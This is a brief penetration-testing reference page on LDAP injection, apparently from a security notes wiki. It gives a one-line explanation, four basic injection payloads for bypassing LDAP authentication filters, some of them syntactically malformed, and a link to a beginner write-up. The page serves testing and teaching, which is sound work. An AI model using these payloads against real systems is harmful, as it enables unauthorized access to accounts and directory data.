# LDAP Injection

LDAP may be vulnerable to query injection if website does not properly validate user input.

### Basic Payloads <a href="#basic-payloads" id="basic-payloads"></a>

```
(&uid=*)(userPassword=*)
(&uid=*)|(userPassword=*)
(&uid=*)|(objectClass=*)(userPassword=password123)

*)(uid=*))(|(password=*)
```

### References <a href="#references" id="references"></a>

* [InfoSec Writeups](https://infosecwriteups.com/for-newbies-simple-examples-of-ldap-injection-vulnerabilities-cbf231431923)